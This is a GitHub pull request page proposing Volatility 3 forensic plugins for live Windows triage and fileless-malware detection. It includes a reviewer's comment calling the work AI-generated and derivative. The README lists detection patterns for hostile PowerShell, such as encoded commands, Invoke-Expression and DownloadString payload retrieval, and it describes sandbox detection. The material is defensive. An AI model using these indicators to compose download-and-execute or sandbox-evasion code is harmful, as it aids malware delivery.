Fileless Malware Hunter Volatility3 Plugin #1905
Open
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# live.py – Volatility 3 Live System Analysis Plugin `live.py` is a custom plugin for **Volatility 3** designed to extend its capabilities for **real-time forensic data collection and threat hunting** directly on a **live Windows system**, eliminating the need for a full memory dump. This tool provides an **interactive command-line shell** for dynamic investigation, leveraging system APIs through libraries like `psutil` and `pywin32` to quickly triage and analyze active endpoints. --- ## Key Capabilities ### **Live Analysis Mode** Performs immediate, low-overhead forensic data collection from an active operating system, bypassing traditional memory dump requirements. ### **Interactive Shell** Includes an integrated CLI environment offering a suite of commands for efficient, step-by-step investigation via the `LiveShellCommand` interface. ### **Advanced Threat Hunting** Provides built-in commands for targeted analysis: - **fileless** – Detects fileless malware and suspicious in-memory activity, focusing on processes such as `powershell.exe`. - **detect_sandbox** – Identifies virtualized or sandboxed environments by inspecting artifacts, process behavior, and MAC address prefixes. ### **Comprehensive Forensic Data Collection** Collects essential artifacts and system information for deep analysis: - **Process and Module Data:** `pslist`, `psscan`, `dlllist`, `handles`, `sids`, `cmdline` - **Network Activity:** `netscan` for active connections and sockets - **Persistence & Services:** Analysis of `services`, `drivers`, `registry`, and autorun entries - **Artifact Analysis:** Extraction of `shimcache`, `prefetch`, `userassist`, and `jumplists` - **Timeline Generation:** Unified event correlation using `timeliner` ---
# fileless.py – Advanced Fileless Malware Hunter (Volatility 3 Plugin) `fileless.py` is a dedicated **Volatility 3 plugin** built for advanced forensic analysis of **Windows memory dumps**. Its primary focus is detecting and reporting threats related to **fileless malware**, **in-memory injection**, and other stealthy attack techniques that evade traditional disk-based antivirus detection. --- ## Key Capabilities ### **Fileless Threat Detection** Scans memory artifacts to uncover indicators of fileless attacks, including: - Reflective DLL loading and process injection - In-memory PowerShell and script-based payloads - Heavily obfuscated or encoded commands ### **Enhanced PowerShell Analysis** Employs a comprehensive set of regular expressions (`POWERSHELL_PATTERNS`) to detect malicious PowerShell behavior, such as: - Use of `-encodedcommand` with high-entropy or base64-encoded strings - Invocation of `Invoke-Expression (IEX)` for dynamic code execution - Network payload retrieval via `.Net.WebClient` or `DownloadString` calls ### **In-Memory Artifact Scanning** Leverages Volatility 3’s core analysis modules (`pslist`, `vadinfo`, `handles`) to identify suspicious or anomalous memory regions: - Detection of **memory hollowing** and **unsigned code injection** - Correlation of **Virtual Address Descriptors (VADs)** with process metadata - Identification of mismatched or hidden modules ### **Structured Forensic Reporting** Automatically generates a detailed **TreeGrid-style report** that presents findings in a structured and analyst-friendly format for triage and incident response. --- ## Reporting and Triage The plugin provides automated scoring and classification of detected threats to accelerate analysis: | **Report Column** | **Description** | |--------------------|-----------------| | **Detection Type** | Category of the threat (e.g., PowerShell Encoded Command, Suspicious Memory Region) | | **Severity** | Risk rating to prioritize analysis (Critical, High, Medium) | | **MITRE ATT&CK** | Maps identified behaviors to MITRE ATT&CK techniques for adversary tracking and intelligence correlation | | **Indicator** | The exact pattern, command, or string that triggered the detection (e.g., base64-encoded command string) | ---
malfav
changed the title
malfav
changed the title
malfav
changed the title
Contributor
|
this screams AI and also the plugin is basically malfind with additional basic YARA malware families .-. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
fileless.py – Advanced Fileless Malware Hunter (Volatility 3 Plugin)
fileless.pyis a dedicated Volatility 3 plugin built for advanced forensic analysis of Windows memory dumps.Its primary focus is detecting and reporting threats related to fileless malware, in-memory injection, and other stealthy attack techniques that evade traditional disk-based antivirus detection.
Key Capabilities
Fileless Threat Detection
Scans memory artifacts to uncover indicators of fileless attacks, including:
Enhanced PowerShell Analysis
Employs a comprehensive set of regular expressions (
POWERSHELL_PATTERNS) to detect malicious PowerShell behavior, such as:-encodedcommandwith high-entropy or base64-encoded stringsInvoke-Expression (IEX)for dynamic code execution.Net.WebClientorDownloadStringcallsIn-Memory Artifact Scanning
Leverages Volatility 3’s core analysis modules (
pslist,vadinfo,handles) to identify suspicious or anomalous memory regions:Structured Forensic Reporting
Automatically generates a detailed TreeGrid-style report that presents findings in a structured and analyst-friendly format for triage and incident response.
Reporting and Triage
The plugin provides automated scoring and classification of detected threats to accelerate analysis: